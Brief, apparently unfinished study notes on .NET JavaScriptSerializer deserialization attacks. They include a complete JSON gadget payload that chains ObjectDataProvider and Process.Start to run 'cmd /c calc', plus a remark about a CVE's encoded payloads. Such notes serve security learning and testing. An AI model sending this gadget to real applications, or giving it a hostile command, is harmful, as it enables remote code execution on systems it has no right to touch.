This is under construction
Deserializaing data back to an object → sometimes shit happens
JavaScriptSerializer( SimpleTypeResolver )
JavaScriptSerializer Deserialization - You can pass a JSON string which will instantiate a class and can run a method. Setters are called. Thus, the gadget must be able to be constructed with 0 args and have a method with 0 args. Example: Process.Start(), which will use the property StartInfo (which we can supply in the json string)
e.g:
{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c calc'
}
}
}
For this CVE, there are two payloads that are encoded+encrypted, separated by an &
The first part is the object’s properties, the second part is the assembly type.